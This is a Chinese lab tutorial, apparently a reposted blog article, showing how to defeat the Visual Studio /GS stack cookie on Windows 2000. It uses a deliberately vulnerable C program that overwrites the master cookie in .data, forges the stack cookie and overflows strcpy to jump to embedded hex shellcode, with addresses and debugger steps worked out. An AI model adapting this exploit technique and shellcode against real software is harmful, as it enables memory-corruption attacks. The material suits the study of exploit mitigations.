C++替换栈中和.data中的cookie实现步骤详解
一、实验环境
操作系统:windows 2000 professional
软件版本:原版OD(实时调试)、VS2008(release)
二、实验代码
#include <stdafx.h>
#include <string.h>
#include <stdlib.h>
char shellcode[]=
"\x90\x90\x90\x90"//new value of cookie in .data
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xF4\x6F\x82\x90"//result of \x90\x90\x90\x90 xor EBP
"\x90\x90\x90\x90"
"\x94\xFE\x12\x00"//address of shellcode
;
void test(char * str, int i, char * src)
{
char dest[200];
if(i<0x9995)
{
char * buf=str+i;
*buf=*src;
*(buf+1)=*(src+1);
*(buf+2)=*(src+2);
*(buf+3)=*(src+3);
strcpy(dest,src);
}
}
void main()
{
__asm int 3
char * str=(char *)malloc(0x10000);
test(str,0xFFFF2FB8,shellcode);
}
代码分析:
(1)test函数会修改s+i到s+i+3(内存地址)中保存的数据;
(2)test函数中strcpy存在典型的溢出漏洞。
三、实验步骤
1、security cookie机制
直接运行到if语句处;
产生:程序将0x403000处保存的值,赋给EAX,将EAX与EBP异或,异或结果(security cookie)存储在EAX中,然后将EAX中的值(也就是security cookie)保存在EBP-4处。
验证:程序从EBP-4处取出值,然后与EBP异或,最后将异或结果与0x00403000处的Cookie进行比较,如果二者一致则校验通过,否则转入校验失败哦的异常处理。
同时可以看到security cookie存放在0x12FF60处。
现在的重点是:
- 将.data中保存的原cookie改为\x90\x90\x90\x90;
- 用\x90\x90\x90\x90与EBP的值进行异或,并替换security cookie;
- 将test函数的返回地址改为shellcode的起始地址,带程序返回时,即可执行shellcode.
2、获取堆区起始地址
调试代码:
#include <stdafx.h>
#include <string.h>
#include <stdlib.h>
char shellcode[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
void test(char * str, int i, char * src)
{
char dest[200];
if(i<0x9995)
{
char * buf=str+i;
*buf=*src;
*(buf+1)=*(src+1);
*(buf+2)=*(src+2);
*(buf+3)=*(src+3);
strcpy(dest,src);
}
}
void main()
{
__asm int 3
char * str=(char *)malloc(0x10000);
test(str,0xFFFF2FB8,shellcode);
}
编译,运行完malloc函数:
可见malloc获取的堆区的起始地址为0x410048。
如何判断堆区在哪儿呢?
- 单步跳过call语句,有些寄存器的值会变红,说明执行完这一函数后,寄存器中的值改变了,实在不会,就将数据窗口依次跳到相应位置。
- 需要多0x178这一偏移地址警惕,因为0x178在堆分配的时候,是空表索引freelist[0]的内存地址;因为堆初始化的时候,只有一个尾块链在freelist[0]处的,且初次分配的时候是从尾块前面“切”的,所以此处会出现0x390178.
故,可以断定,0x410048为申请的空间的起始地址,也就是str的值。
3、修改.data中的原始cookie
查看.data在内存中的起始地址;
可见.data在内存中的起始地址为0x403000。
0x403000属于低地址,0x410048属于高地址,因为i并没有规定上限,因此只需将i设置为0xFFFF2FB8即可让str指向0x403000。
可见,.data中的原cookie已经被覆盖。
4、查看栈区dest的起始地址
可以在OD中看到粗线部分,起始就是strcpy函数。可见起始地址为0x12FE94.
5、构造shellcode
计算security cookie时的EBP为0x12FF64,.data存放的原cookie改为\x90\x90\x90\x90,伪造的security cookie就是0x90826FF4.
security cookie应存放在0x12FF60,dest的起始地址为0x12FE94,所以shellcode可以这样构造:
将构造好的shellcode复制到程序中,运行:
strcpy之后,可见security cookie和test函数的返回地址都被覆盖了!
F9运行:
到此这篇关于c++替换栈中和.data中的cookie实现步骤详解的文章就介绍到这了,更多相关C++替换栈中和.data中的cookie内容请搜索以前的文章或继续浏览下面的相关文章希望大家以后多多支持!
相关文章